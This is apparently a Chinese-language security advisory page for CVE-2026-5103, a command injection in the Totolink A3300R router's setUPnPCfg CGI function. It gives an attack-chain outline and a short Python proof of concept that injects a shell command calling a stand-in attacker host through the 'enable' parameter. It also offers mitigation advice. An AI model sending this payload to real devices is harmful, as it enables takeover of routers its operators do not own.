IPBUF安全漏洞报告
English
CVE-2026-5103 CVSS 6.3 中危

CVE-2026-5103 Totolink A3300R命令注入漏洞

披露日期: 2026-03-30
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5103
漏洞类型
命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Totolink A3300R

相关标签

命令注入RCETotolinkIoT路由器

漏洞概述

Totolink A3300R路由器固件版本17.0.0cu.557_b20221024中存在命令注入漏洞。该漏洞位于/cgi-bin/cstecgi.cgi文件的setUPnPCfg功能中。由于未对enable参数进行有效过滤,攻击者可构造恶意请求远程注入并执行系统命令。目前该漏洞利用代码已公开,可能导致设备被控制。

技术细节

该漏洞源于Totolink A3300R路由器Web管理接口对用户输入的验证缺失。具体在/cgi-bin/cstecgi.cgi脚本处理setUPnPCfg请求时,enable参数直接被拼接到系统命令中执行,未经过滤特殊字符。攻击者可发送包含shell元字符(如分号、管道符)的恶意数据包。根据CVSS 3.1评分,攻击者仅需低权限且无需用户交互即可通过网络发起攻击。成功利用后,攻击者可在设备后台执行任意命令,造成信息泄露、数据篡改或服务中断。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别出暴露在互联网上的Totolink A3300R设备,并确认其运行受影响版本。
STEP 2
2. 漏洞利用
攻击者向目标设备的/cgi-bin/cstecgi.cgi接口发送特制的POST请求,在enable参数中注入恶意Shell命令。
STEP 3
3. 命令执行
由于后端未过滤参数,注入的命令在系统层面被执行,攻击者获得设备控制权。
STEP 4
4. 后续攻击
攻击者利用获得的Shell权限安装后门、窃取敏感数据或发起进一步的网络攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target_url = "http://target-ip/cgi-bin/cstecgi.cgi" headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/json" } # Payload to inject command (e.g., ping a test server or reboot) # The 'enable' argument is vulnerable to command injection payload = "; ping -c 4 attacker.com" data = { "function": "setUPnPCfg", "enable": payload } try: response = requests.post(target_url, json=data, headers=headers, timeout=5) print(f"[+] Status: {response.status_code}") print(f"[+] Response: {response.text}") except Exception as e: print(f"[-] Error: {e}")

影响范围

Totolink A3300R 17.0.0cu.557_b20221024

防御指南

临时缓解措施
建议用户立即检查设备固件版本,如果存在漏洞,应尽快升级至官方修复版本。在未升级前,建议关闭路由器的远程Web管理功能,并将管理端口仅限于内网访问,以降低被攻击风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表